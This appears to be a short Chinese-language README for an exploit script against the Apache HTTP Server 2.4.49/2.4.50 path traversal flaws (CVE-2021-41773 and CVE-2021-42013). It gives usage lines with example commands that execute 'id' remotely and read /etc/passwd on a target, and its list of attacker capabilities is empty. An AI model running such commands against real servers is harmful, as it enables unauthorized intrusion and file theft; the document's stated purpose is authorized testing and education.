CVE-2021-41773 & CVE-2021-42013
这些是影响 Apache HTTP Server 2.4.49 和 2.4.50 的严重路径遍历漏洞。
它们允许攻击者:
这两个漏洞已在 Apache 2.4.51 中修复。
强烈建议立即升级。
python3 exploit.py --url <TARGET> --port [PORT] (--rce --command "COMMAND" | --lfi --path "/path/to/file")
示例
python3 exploit.py --url http://192.168.1.10 --rce --command "id"

python3 exploit.py --url http://192.168.1.10 --lfi --path "/etc/passwd"

此漏洞利用脚本仅限用于授权的安全测试、防御研究和教育目的。